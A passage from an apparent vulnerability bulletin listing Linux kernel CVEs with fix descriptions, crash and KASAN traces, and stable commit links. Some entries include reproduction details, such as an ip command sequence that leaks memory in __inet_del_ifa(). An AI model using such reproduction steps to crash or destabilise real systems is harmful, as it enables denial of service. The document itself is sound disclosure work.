DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ext4_es_cache_extent+0xe2/0x210 ext4_cache_extents+0xd2/0x110 ext4_find_extent+0x5d5/0x8c0 ext4_ext_map_blocks+0x9c/0x1d30 ext4_map_blocks+0x431/0xa50 ext4_getblk+0x82/0x340 ext4_bread+0x14/0x110 ext4_quota_read+0xf0/0x180 v2_read_header+0x24/0x90 v2_check_quota_file+0x2f/0xa0 dquot_load_quota_sb+0x26c/0x760 dquot_load_quota_inode+0xa5/0x190 ext4_enable_quotas+0x14c/0x300 __ext4_fill_super+0x31cc/0x32c0 ext4_fill_super+0x115/0x2d0 get_tree_bdev+0x1d2/0x360 ext4_get_tree+0x19/0x30 vfs_get_tree+0x26/0xe0 path_mount+0x81d/0xfc0 do_mount+0x8d/0xc0 __x64_sys_mount+0xc0/0x160 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> ================================================================== The above issue may happen as follows: ------------------------------------- ext4_fill_super ext4_orphan_cleanup ext4_enable_quotas ext4_quota_enable ext4_iget --> get error inode <5> ext4_ext_check_inode --> Wrong imode makes it escape inspection make_bad_inode(inode) --> EXT4_BOOT_LOADER_INO set imode dquot_load_quota_inode vfs_setup_quota_inode --> check pass dquot_load_quota_sb v2_check_quota_file v2_read_header ext4_quota_read ext4_bread ext4_getblk ext4_map_blocks ext4_ext_map_blocks ext4_find_extent ext4_cache_extents ext4_es_cache_extent __es_tree_search.isra.0 ext4_es_end --> Wrong extents trigger BUG_ON In the above issue, s_usr_quota_inum is set to 5, but inode<5> contains an incorrect imode and disordered extents. Because 5 is EXT4_BOOT_LOADER_INO, the ext4_ext_check_inode check in the ext4_iget function can be bypassed; finally, the extents that are not checked trigger the BUG_ON in the __es_tree_search function. To solve this issue, check whether the inode is bad_inode in vfs_setup_quota_inode(). | 2025-12-24 | not yet calculated | CVE-2022-50782 | https://git.kernel.org/stable/c/fb1d3b4107b4837b4a0dbbf01954269bd6acfdc3 https://git.kernel.org/stable/c/1d5524832ff204b8a8cd54ae1628b2122f6e9a8d https://git.kernel.org/stable/c/98004f926d27eaccdd2d336b7916a42e07392da1 https://git.kernel.org/stable/c/0dcbf4dc3d54aab5990952cfd832042fb300dbe3 https://git.kernel.org/stable/c/794c9175db1f2e5d2a28c326f10bd024dbd944f8 https://git.kernel.org/stable/c/1daff79463d7d76096c84c57cddc30c5d4be2226 https://git.kernel.org/stable/c/d323877484765aaacbb2769b06e355c2041ed115 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: use proper req destructor for IPv6 Before, only the destructor from TCP request sock in IPv4 was called even if the subflow was IPv6. It is important to use the right destructor to avoid memory leaks with some advanced IPv6 features, e.g. when the request socks contain specific IPv6 options. | 2025-12-24 | not yet calculated | CVE-2022-50783 | https://git.kernel.org/stable/c/6eb02c596ec02e5897ae377e065cb7df55337a96 https://git.kernel.org/stable/c/bd5dc96fea4edd16d2e22f41b4dd50a4cfbeb919 https://git.kernel.org/stable/c/092953f3c4cd65f88b27b87a922f6c725f34ee04 https://git.kernel.org/stable/c/1922ea6b0ae2ea0c9a09be0eafafe1cd1069d259 https://git.kernel.org/stable/c/d3295fee3c756ece33ac0d935e172e68c0a4161b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix potential use-after-free bug when trimming caps When trimming the caps, just after the 'session->s_cap_lock' is released in ceph_iterate_session_caps() the cap may be removed by another thread, and using the stale cap memory in the callbacks will trigger a use-after-free crash. We need to check the existence of the cap just after the 'ci->i_ceph_lock' is acquired, and do nothing if it's already removed. | 2025-12-24 | not yet calculated | CVE-2023-53867 | https://git.kernel.org/stable/c/2b2515b8095cf2149bef44383a99d5b5677f1831 https://git.kernel.org/stable/c/448875a73e16ba7d81dec9274ce9d33a12d092fb https://git.kernel.org/stable/c/ae6e935618d99cdba11eab4714092e7e5f13cf7e https://git.kernel.org/stable/c/aaf67de78807c59c35bafb5003d4fb457c764800 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mips: bmips: BCM6358: disable RAC flush for TP1 RAC flush causes kernel panics on BCM6358 with EHCI/OHCI when booting from TP1: [ 3.881739] usb 1-1: new high-speed USB device number 2 using ehci-platform [ 3.895011] Reserved instruction in kernel code[#1]: [ 3.900113] CPU: 0 PID: 1 Comm: init Not tainted 5.10.16 #0 [ 3.905829] $ 0 : 00000000 10008700 00000000 77d94060 [ 3.911238] $ 4 : 7fd1f088 00000000 81431cac 81431ca0 [ 3.916641] $ 8 : 00000000 ffffefff 8075cd34 00000000 [ 3.922043] $12 : 806f8d40 f3e812b7 00000000 000d9aaa [ 3.927446] $16 : 7fd1f068 7fd1f080 7ff559b8 81428470 [ 3.932848] $20 : 00000000 00000000 55590000 77d70000 [ 3.938251] $24 : 00000018 00000010 [ 3.943655] $28 : 81430000 81431e60 81431f28 800157fc [ 3.949058] Hi : 00000000 [ 3.952013] Lo : 00000000 [ 3.955019] epc : 80015808 setup_sigcontext+0x54/0x24c [ 3.960464] ra : 800157fc setup_sigcontext+0x48/0x24c [ 3.965913] Status: 10008703 KERNEL EXL IE [ 3.970216] Cause : 00800028 (ExcCode 0a) [ 3.974340] PrId : 0002a010 (Broadcom BMIPS4350) [ 3.979170] Modules linked in: ohci_platform ohci_hcd fsl_mph_dr_of ehci_platform ehci_fsl ehci_hcd gpio_button_hotplug usbcore nls_base usb_common [ 3.992907] Process init (pid: 1, threadinfo=(ptrval), task=(ptrval), tls=77e22ec8) [ 4.000776] Stack : 81431ef4 7fd1f080 81431f28 81428470 7fd1f068 81431edc 7ff559b8 81428470 [ 4.009467] 81431f28 7fd1f080 55590000 77d70000 77d5498c 80015c70 806f0000 8063ae74 [ 4.018149] 08100002 81431f28 0000000a 08100002 81431f28 0000000a 77d6b418 00000003 [ 4.026831] ffffffff 80016414 80080734 81431ecc 81431ecc 00000001 00000000 04000000 [ 4.035512] 77d54874 00000000 00000000 00000000 00000000 00000012 00000002 00000000 [ 4.044196] ... [ 4.046706] Call Trace: [ 4.049238] [<80015808>] setup_sigcontext+0x54/0x24c [ 4.054356] [<80015c70>] setup_frame+0xdc/0x124 [ 4.059015] [<80016414>] do_notify_resume+0x1dc/0x288 [ 4.064207] [<80011b50>] work_notifysig+0x10/0x18 [ 4.069036] [ 4.070538] Code: 8fc300b4 00001025 26240008 <ac820000> ac830004 3c048063 0c0228aa 24846a00 26240010 [ 4.080686] [ 4.082517] ---[ end trace 22a8edb41f5f983b ]--- [ 4.087374] Kernel panic - not syncing: Fatal exception [ 4.092753] Rebooting in 1 seconds.. Because the bootloader (CFE) is not initializing the Read-ahead cache properly on the second thread (TP1). Since the RAC was not initialized properly, we should avoid flushing it at the risk of corrupting the instruction stream as seen in the trace above. | 2025-12-24 | not yet calculated | CVE-2023-53986 | https://git.kernel.org/stable/c/d65de5ee8b72868fbbbd39ca73017d0e526fa13a https://git.kernel.org/stable/c/47a449ec09b4479b89dcc6b27ec3829fc82ffafb https://git.kernel.org/stable/c/65b723644294f1d79770704162c0e8d1f700b6f1 https://git.kernel.org/stable/c/2cdbcff99f15db86a10672fb220379a1ae46ccae https://git.kernel.org/stable/c/288c96aa5b5526cd4a946e84ef85e165857693b5 https://git.kernel.org/stable/c/ab327f8acdf8d06601fbf058859a539a9422afff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ping: Fix potential NULL deref for /proc/net/icmp. After commit dbca1596bbb0 ("ping: convert to RCU lookups, get rid of rwlock"), we use RCU for ping sockets, but we should use spinlock for /proc/net/icmp to avoid a potential NULL deref mentioned in the previous patch. Let's go back to using spinlock there. Note we can convert ping sockets to use hlist instead of hlist_nulls because we do not use SLAB_TYPESAFE_BY_RCU for ping sockets. | 2025-12-24 | not yet calculated | CVE-2023-53987 | https://git.kernel.org/stable/c/5a08a32e624908890aa0a2eb442bb6a7669891a8 https://git.kernel.org/stable/c/176cbb6da28f36506cc60a4bec4ab8df0c16713a https://git.kernel.org/stable/c/ab5fb73ffa01072b4d8031cc05801fa1cb653bee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix slab-out-of-bounds read in hdr_delete_de() Here is a BUG report from syzbot: BUG: KASAN: slab-out-of-bounds in hdr_delete_de+0xe0/0x150 fs/ntfs3/index.c:806 Read of size 16842960 at addr ffff888079cc0600 by task syz-executor934/3631 Call Trace: memmove+0x25/0x60 mm/kasan/shadow.c:54 hdr_delete_de+0xe0/0x150 fs/ntfs3/index.c:806 indx_delete_entry+0x74f/0x3670 fs/ntfs3/index.c:2193 ni_remove_name+0x27a/0x980 fs/ntfs3/frecord.c:2910 ntfs_unlink_inode+0x3d4/0x720 fs/ntfs3/inode.c:1712 ntfs_rename+0x41a/0xcb0 fs/ntfs3/namei.c:276 Before using the meta-data in struct INDEX_HDR, we need to check whether the index header is valid. Otherwise, a corrupted (or malicious) fs image can cause an out-of-bounds access which could make the kernel panic. | 2025-12-24 | not yet calculated | CVE-2023-53988 | https://git.kernel.org/stable/c/c58ea97aa94f033ee64a8cb6587d84a9849b6216 https://git.kernel.org/stable/c/9163a5b4ed290da4a7d23fa92533e0e81fd0166e https://git.kernel.org/stable/c/114204d25e1dffdd3a0c1cfbba219afd344f4b4f https://git.kernel.org/stable/c/4a034ece7e2877673d9085d6e7ed45e6ee40b761 https://git.kernel.org/stable/c/ab84eee4c7ab929996602eda7832854c35a6dda2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: mm: fix VA-range sanity check Both create_mapping_noalloc() and update_mapping_prot() sanity-check their 'virt' parameter, but the check itself doesn't make much sense. The condition used today appears to be a historical accident. The sanity-check condition: if ((virt >= PAGE_END) && (virt < VMALLOC_START)) { [ ... warning here ... ] return; } ... can only be true for the KASAN shadow region or the module region, and there's no reason to exclude these specifically for creating and updating mappings. When arm64 support was first upstreamed in commit: c1cc1552616d0f35 ("arm64: MMU initialisation") ... the condition was: if (virt < VMALLOC_START) { [ ... warning here ... ] return; } At the time, VMALLOC_START was the lowest kernel address, and this was checking whether 'virt' would be translated via TTBR1. Subsequently in commit: 14c127c957c1c607 ("arm64: mm: Flip kernel VA space") ... the condition was changed to: if ((virt >= VA_START) && (virt < VMALLOC_START)) { [ ... warning here ... ] return; } This appears to have been a thinko. The commit moved the linear map to the bottom of the kernel address space, with VMALLOC_START being at the halfway point. The old condition would warn for changes to the linear map below this, and at the time VA_START was the end of the linear map. Subsequently we cleaned up the naming of VA_START in commit: 77ad4ce69321abbe ("arm64: memory: rename VA_START to PAGE_END") ... keeping the erroneous condition as: if ((virt >= PAGE_END) && (virt < VMALLOC_START)) { [ ... warning here ... ] return; } Correct the condition to check against the start of the TTBR1 address space, which is currently PAGE_OFFSET. This simplifies the logic, and more clearly matches the "outside kernel range" message in the warning. | 2025-12-24 | not yet calculated | CVE-2023-53989 | https://git.kernel.org/stable/c/9d8d3df71516ec3236d8d93ff029d251377ba4b1 https://git.kernel.org/stable/c/32020fc2a8373d3de35ae6d029d5969a42651e7a https://git.kernel.org/stable/c/621619f626cbe702ddbdc54117f3868b8ebd8129 https://git.kernel.org/stable/c/b03c7fcc5ed854d0e1b27e9abf12428bfa751a37 https://git.kernel.org/stable/c/ab9b4008092c86dc12497af155a0901cc1156999 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SMB3: Add missing locks to protect deferred close file list cifs_del_deferred_close function has a critical section which modifies the deferred close file list. We must acquire deferred_lock before calling cifs_del_deferred_close function. | 2025-12-24 | not yet calculated | CVE-2023-53990 | https://git.kernel.org/stable/c/0f87e18203bd30f71eb1a65259e28e291b6cc43a https://git.kernel.org/stable/c/3aa9d065b0685b4e6052f3f2a2462966fdc44fd2 https://git.kernel.org/stable/c/cb36365dac25d546ca4af0eb22acb43c9b4ddfdf https://git.kernel.org/stable/c/32a046ccaeea6c19965c04a4c521e703f6607924 https://git.kernel.org/stable/c/ab9ddc87a9055c4bebd6524d5d761d605d52e557 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Disallow unallocated resources to be returned In the event that the topology requests resources that have not been created by the system (because they are typically not represented in dpu_mdss_cfg ^1), the resource(s) in global_state (in this case DSC blocks, until their allocation/assignment is being sanity-checked in "drm/msm/dpu: Reject topologies for which no DSC blocks are available") remain NULL but will still be returned out of dpu_rm_get_assigned_resources, where the caller expects to get an array containing num_blks valid pointers (but instead gets these NULLs). To prevent this from happening, where null-pointer dereferences typically result in a hard-to-debug platform lockup, num_blks shouldn't increase past NULL blocks and will print an error and break instead. After all, max_blks represents the static size of the maximum number of blocks whereas the actual amount varies per platform. ^1: which can happen after a git rebase ended up moving additions to _dpu_cfg to a different struct which has the same patch context. Patchwork: https://patchwork.freedesktop.org/patch/517636/ | 2025-12-24 | not yet calculated | CVE-2023-53991 | https://git.kernel.org/stable/c/8dbd54d679e3ab37be43bc1ed9f463dbf83a2259 https://git.kernel.org/stable/c/bf661c5e3bc48973acb363c76e3db965d9ed26d0 https://git.kernel.org/stable/c/9e1e236acdc42b5c43ec8d7f03a39537e70cc309 https://git.kernel.org/stable/c/9fe3644c720ac87d150f0bba5a4ae86cae55afaf https://git.kernel.org/stable/c/abc40122d9a69f56c04efb5a7485795f5ac799d1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: ocb: don't leave if not joined If there's no OCB state, don't ask the driver/mac80211 to leave, since that's just confusing. Since we set/clear the chandef state, that's a simple check. | 2025-12-24 | not yet calculated | CVE-2023-53992 | https://git.kernel.org/stable/c/d7b0fe3487d203c04ee1bda91a63bd4dd398c350 https://git.kernel.org/stable/c/94332210902967b7d63294b43428c8ed075b20e6 https://git.kernel.org/stable/c/abc76cf552e13cfa88a204b362a86b0e08e95228 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/DOE: Fix memory leak with CONFIG_DEBUG_OBJECTS=y After a pci_doe_task completes, its work_struct needs to be destroyed to avoid a memory leak with CONFIG_DEBUG_OBJECTS=y. | 2025-12-24 | not yet calculated | CVE-2023-53993 | https://git.kernel.org/stable/c/2a0e0f4773fe8032fb17e56f897bee32ce3cdc2b https://git.kernel.org/stable/c/95628b830952943631d3d74f73f431f501c5d6f5 https://git.kernel.org/stable/c/abf04be0e7071f2bcd39bf97ba407e7d4439785e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ionic: remove WARN_ON to prevent panic_on_warn Remove unnecessary early code development check and the WARN_ON that it uses. The irq alloc and free paths have long been cleaned up and this check shouldn't have stuck around so long. | 2025-12-24 | not yet calculated | CVE-2023-53994 | https://git.kernel.org/stable/c/4c7276a6daf7e13a6dd30b0347b3f2c7df4d40bb https://git.kernel.org/stable/c/f8cc4fd99a325505e15c3da95d6de266efd3d9b5 https://git.kernel.org/stable/c/1417dd787a5e55b410a00a28231b0dcb19172457 https://git.kernel.org/stable/c/dc470466753ad0dd3a8c48aaefa05a992c119b9c https://git.kernel.org/stable/c/daeaad114cb163ec51bcf14326cb7fe37d368459 https://git.kernel.org/stable/c/abfb2a58a5377ebab717d4362d6180f901b6e5c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipv4: fix one memleak in __inet_del_ifa() I got the below warning when doing fuzzing tests: unregister_netdevice: waiting for bond0 to become free. Usage count = 2 It can be reproduced via: ip link add bond0 type bond sysctl -w net.ipv4.conf.bond0.promote_secondaries=1 ip addr add 4.117.174.103/0 scope 0x40 dev bond0 ip addr add 192.168.100.111/255.255.255.254 scope 0 dev bond0 ip addr add 0.0.0.4/0 scope 0x40 secondary dev bond0 ip addr del 4.117.174.103/0 scope 0x40 dev bond0 ip link delete bond0 type bond In this reproduction test case, an incorrect 'last_prim' is found in __inet_del_ifa(); as a result, the secondary address (0.0.0.4/0 scope 0x40) is lost. The memory of the secondary address is leaked and the references to in_device and net_device are leaked. Fix this problem: look for 'last_prim' starting at the location of the deleted IP and insert the promoted IP into the location of 'last_prim'. | 2025-12-24 | not yet calculated | CVE-2023-53995 | https://git.kernel.org/stable/c/5624f26a3574500ce23929cb2c9976a0dec9920a https://git.kernel.org/stable/c/7c8ddcdab1b900bed69cad6beef477fff116289e https://git.kernel.org/stable/c/2f1e86014d0cc084886c36a2d77bc620e2d42618 https://git.kernel.org/stable/c/980f8445479814509a3cd55a8eabaae1c9030a4c https://git.kernel.org/stable/c/42652af5360d30b43b06057c193739e7dfb18f42 https://git.kernel.org/stable/c/ac28b1ec6135649b5d78b028e47264cb3ebca5ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/sev: Make enc_dec_hypercall() accept a size instead of npages enc_dec_hypercall() accepted a page count instead of a size, which forced its callers to round up. As a result, non-page aligned vaddrs caused pages to be spuriously marked as decrypted via the encryption status hypercall, which in turn caused consistent corruption of pages during live migration. Live migration requires accurate encryption status information to avoid migrating pages from the wrong perspective. | 2025-12-24 | not yet calculated | CVE-2023-53996 | https://git.kernel.org/stable/c/ba50e7773a99a109a1ea6f753b766a080d3b21cc https://git.kernel.org/stable/c/6615212d8e131b45bd9705b0d69cc0d2f624666f https://git.kernel.org/stable/c/8ae7457e71a320867d868f2622d7c643596e4f43 https://git.kernel.org/stable/c/ac3f9c9f1b37edaa7d1a9b908bc79d843955a1a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: of: fix double-free on unregistration Since commit 3d439b1a2ad3 ("thermal/core: Alloc-copy-free the thermal zone parameters structure"), thermal_zone_device_register() allocates a copy of the tzp argument and frees it when unregistering, so thermal_of_zone_register() now ends up leaking its original tzp and double-freeing the tzp copy. Fix this by locating tzp on stack instead. | 2025-12-24 | not yet calculated | CVE-2023-53997 | https://git.kernel.org/stable/c/adce49089412a9ae28f5c666e0bb12fbcd86b3f7 https://git.kernel.org/stable/c/ac4436a5b20e0ef1f608a9ef46c08d5d142f8da6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: virtio - Fix race on data_avail and actual data The virtio rng device kicks off a new entropy request whenever the data available reaches zero. When a new request occurs at the end of a read operation, that is, when the result of that request is only needed by the next reader, then there is a race between the writing of the new data and the next reader. This is because there is no synchronisation whatsoever between the writer and the reader. Fix this by writing data_avail with smp_store_release and reading it with smp_load_acquire when we first enter read. The subsequent reads are safe because they're either protected by the first load acquire, or by the completion mechanism. Also remove the redundant zeroing of data_idx in random_recv_done (data_idx must already be zero at this point) and data_avail in request_entropy (ditto). | 2025-12-24 | not yet calculated | CVE-2023-53998 | https://git.kernel.org/stable/c/241ef15776a7c8505008db689175b320d345ecd3 https://git.kernel.org/stable/c/a43bcb0b661cbbf3ad797d2aee6b6fd06b8fc69d https://git.kernel.org/stable/c/77471e4912d3960dafe141e268c44be8024fe4dc https://git.kernel.org/stable/c/c76d991b6f01a5d931e7053a73bc9524975a5215 https://git.kernel.org/stable/c/22c30022cde6e2c88612b3a499223cfa912f1bc7 https://git.kernel.org/stable/c/318657b4c2077289659f1cd9e2a34f6a3b208e3e https://git.kernel.org/stable/c/2fc91f156b3f3446a1bce80cf4adedcbf41271c2 https://git.kernel.org/stable/c/ac52578d6e8d300dd50f790f29a24169b1edd26c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: TC, Fix internal port memory leak The flow rule can be split, and the extra post_act rules are added to the post_act table. It's possible to trigger a memleak when the rule forwards packets from an internal port and over a tunnel, in the case that, for example, CT 'new' state offload is allowed. As the int_port object is assigned to the flow attribute of the post_act rule, and its refcnt is incremented by mlx5e_tc_int_port_get(), but mlx5e_tc_int_port_put() is not called, the refcnt is never decremented, so int_port is never freed. kmemleak reports the following error: unreferenced object 0xffff888128204b80 (size 64): comm "handler20", pid 50121, jiffies 4296973009 (age 642.932s) hex dump (first 32 bytes): 01 00 00 00 19 00 00 00 03 f0 00 00 04 00 00 00 ................ 98 77 67 41 81 88 ff ff 98 77 67 41 81 88 ff ff .wgA.....wgA.... backtrace: [<00000000e992680d>] kmalloc_trace+0x27/0x120 [<000000009e945a98>] mlx5e_tc_int_port_get+0x3f3/0xe20 [mlx5_core] [<0000000035a537f0>] mlx5e_tc_add_fdb_flow+0x473/0xcf0 [mlx5_core] [<0000000070c2cec6>] __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core] [<000000005cc84048>] mlx5e_configure_flower+0xd40/0x4c40 [mlx5_core] [<000000004f8a2031>] mlx5e_rep_indr_offload.isra.0+0x10e/0x1c0 [mlx5_core] [<000000007df797dc>] mlx5e_rep_indr_setup_tc_cb+0x90/0x130 [mlx5_core] [<0000000016c15cc3>] tc_setup_cb_add+0x1cf/0x410 [<00000000a63305b4>] fl_hw_replace_filter+0x38f/0x670 [cls_flower] [<000000008bc9e77c>] fl_change+0x1fd5/0x4430 [cls_flower] [<00000000e7f766e4>] tc_new_tfilter+0x867/0x2010 [<00000000e101c0ef>] rtnetlink_rcv_msg+0x6fc/0x9f0 [<00000000e1111d44>] netlink_rcv_skb+0x12c/0x360 [<0000000082dd6c8b>] netlink_unicast+0x438/0x710 [<00000000fc568f70>] netlink_sendmsg+0x794/0xc50 [<0000000016e92590>] sock_sendmsg+0xc5/0x190 So fix this by moving the int_port cleanup code to the flow attribute free helper, which is used by all the attribute free cases. | 2025-12-24 | not yet calculated | CVE-2023-53999 | https://git.kernel.org/stable/c/bc1918bac0f30e3f551ef5649b53062917db55fa https://git.kernel.org/stable/c/ac5da544a3c2047cbfd715acd9cec8380d7fe5c6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix deadlock issue when externel_lb and reset are executed together When externel_lb and reset are executed together, a deadlock may occur: [ 3147.217009] INFO: task kworker/u321:0:7 blocked for more than 120 seconds. [ 3147.230483] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 3147.238999] task:kworker/u321:0 state:D stack: 0 pid: 7 ppid: 2 flags:0x00000008 [ 3147.248045] Workqueue: hclge hclge_service_task [hclge] [ 3147.253957] Call trace: [ 3147.257093] __switch_to+0x7c/0xbc [ 3147.261183] __schedule+0x338/0x6f0 [ 3147.265357] schedule+0x50/0xe0 [ 3147.269185] schedule_preempt_disabled+0x18/0x24 [ 3147.274488] __mutex_lock.constprop.0+0x1d4/0x5dc [ 3147.279880] __mutex_lock_slowpath+0x1c/0x30 [ 3147.284839] mutex_lock+0x50/0x60 [ 3147.288841] rtnl_lock+0x20/0x2c [ 3147.292759] hclge_reset_prepare+0x68/0x90 [hclge] [ 3147.298239] hclge_reset_subtask+0x88/0xe0 [hclge] [ 3147.303718] hclge_reset_service_task+0x84/0x120 [hclge] [ 3147.309718] hclge_service_task+0x2c/0x70 [hclge] [ 3147.315109] process_one_work+0x1d0/0x490 [ 3147.319805] worker_thread+0x158/0x3d0 [ 3147.324240] kthread+0x108/0x13c [ 3147.328154] ret_from_fork+0x10/0x18 In the externel_lb process, the hns3 driver calls napi_disable() first; then the reset happens, the restore process of the externel_lb fails, and napi_enable() is not called. When doing externel_lb again, napi_disable() is called twice, causing a deadlock on rtnl_lock(). This patch uses the HNS3_NIC_STATE_DOWN state to protect the calling of napi_disable() and napi_enable() in the externel_lb process, just as in ndo_stop() and ndo_start(). | 2025-12-24 | not yet calculated | CVE-2023-54000 | https://git.kernel.org/stable/c/d9f609cb50ebab4aa6341112f406bf9d3928ac81 https://git.kernel.org/stable/c/743f7c1762e098048ede8cdf8c89a118f8d12391 https://git.kernel.org/stable/c/ef2d6bf9695669d31ece9f2ef39dec84874a87c7 https://git.kernel.org/stable/c/ac6257a3ae5db5193b1f19c268e4f72d274ddb88 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: r8712: Fix memory leak in _r8712_init_xmit_priv() In the above mentioned routine, memory is allocated in several places. If the first succeeds and a later one fails, the routine will leak memory. This patch fixes commit 2865d42c78a9 ("staging: r8712u: Add the new driver to the mainline kernel"). A potential memory leak in r8712_xmit_resource_alloc() is also addressed. | 2025-12-24 | not yet calculated | CVE-2023-54001 | https://git.kernel.org/stable/c/fc511ae405f7ba29fbcb0246061ec15c272386e1 https://git.kernel.org/stable/c/acacdbe0f740ca8c5d5da73d50870903a3ded677 https://git.kernel.org/stable/c/41e05572e871b10dbdc168c76175c97982daf4a4 https://git.kernel.org/stable/c/874555472c736813ba1f4baf0b4c09c8e26d81ea https://git.kernel.org/stable/c/ac83631230f77dda94154ed0ebfd368fc81c70a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix assertion of exclop condition when starting balance Balance as exclusive state is compatible with paused balance and device add, which makes some things more complicated. The assertion of valid states when starting from paused balance needs to take into account two more states; the combinations can be hit when there are several threads racing to start balance and device add. This won't typically happen when the commands are started from the command line. Scenario 1: With exclusive_operation state == BTRFS_EXCLOP_NONE. Concurrently adding multiple devices to the same mount point, if btrfs_exclop_finish finishes before the assertion in btrfs_exclop_balance, exclusive_operation will be changed to the BTRFS_EXCLOP_NONE state, which leads to assertion failed: fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE || fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD, in fs/btrfs/ioctl.c:456 Call Trace: <TASK> btrfs_exclop_balance+0x13c/0x310 ? memdup_user+0xab/0xc0 ? PTR_ERR+0x17/0x20 btrfs_ioctl_add_dev+0x2ee/0x320 btrfs_ioctl+0x9d5/0x10d0 ? btrfs_ioctl_encoded_write+0xb80/0xb80 __x64_sys_ioctl+0x197/0x210 do_syscall_64+0x3c/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd Scenario 2: With exclusive_operation state == BTRFS_EXCLOP_BALANCE_PAUSED. Concurrently adding multiple devices to the same mount point, if btrfs_exclop_balance finishes before the latter thread executes the assertion in btrfs_exclop_balance, exclusive_operation will be changed to the BTRFS_EXCLOP_BALANCE_PAUSED state, which leads to assertion failed: fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE || fs_info->exclusive_operation == BTRFS_EXCLOP_DEV_ADD || fs_info->exclusive_operation == BTRFS_EXCLOP_NONE, fs/btrfs/ioctl.c:458 Call Trace: <TASK> btrfs_exclop_balance+0x240/0x410 ? memdup_user+0xab/0xc0 ? PTR_ERR+0x17/0x20 btrfs_ioctl_add_dev+0x2ee/0x320 btrfs_ioctl+0x9d5/0x10d0 ? btrfs_ioctl_encoded_write+0xb80/0xb80 __x64_sys_ioctl+0x197/0x210 do_syscall_64+0x3c/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd An example of the failed assertion is below, which shows that the paused balance also needs to be checked. root@syzkaller:/home/xsk# ./repro Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 [ 416.611428][ T7970] BTRFS info (device loop0): fs_info exclusive_operation: 0 Failed to add device /dev/vda, errno 14 [ 416.613973][ T7971] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.615456][ T7972] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.617528][ T7973] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.618359][ T7974] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.622589][ T7975] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.624034][ T7976] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.626420][ T7977] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.627643][ T7978] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.629006][ T7979] BTRFS info (device loop0): fs_info exclusive_operation: 3 [ 416.630298][ T7980] BTRFS info (device loop0): fs_info exclusive_operation: 3 Fai ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54002 | https://git.kernel.org/stable/c/17eaeee4c5f24946aad0298d51f32981c3161d13 https://git.kernel.org/stable/c/7877dc1136ada770622d22041be306539902951b https://git.kernel.org/stable/c/6062e9e335a3bf409b5118bfe4cc10aff4b6adb1 https://git.kernel.org/stable/c/ac868bc9d136cde6e3eb5de77019a63d57a540ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/core: Fix GID entry ref leak when create_ah fails If the AH create request fails, release sgid_attr to avoid the GID entry reference leak reported while releasing the GID table. | 2025-12-24 | not yet calculated | CVE-2023-54003 | https://git.kernel.org/stable/c/9c46c49ad3ffe84121715d392b5a0a94f9f10669 https://git.kernel.org/stable/c/d1b9b3191697a80aca8e247320eba46f24d41d18 https://git.kernel.org/stable/c/e97ff11b396c320d2cc025b09741ba432fcb20a2 https://git.kernel.org/stable/c/370280c65c28a515b841c9f2c08524f06182510c https://git.kernel.org/stable/c/632d6baf8884d803e598bf5164008d23fd9b736c https://git.kernel.org/stable/c/aca3b0fa3d04b40c96934d86cc224cccfa7ea8e0 |
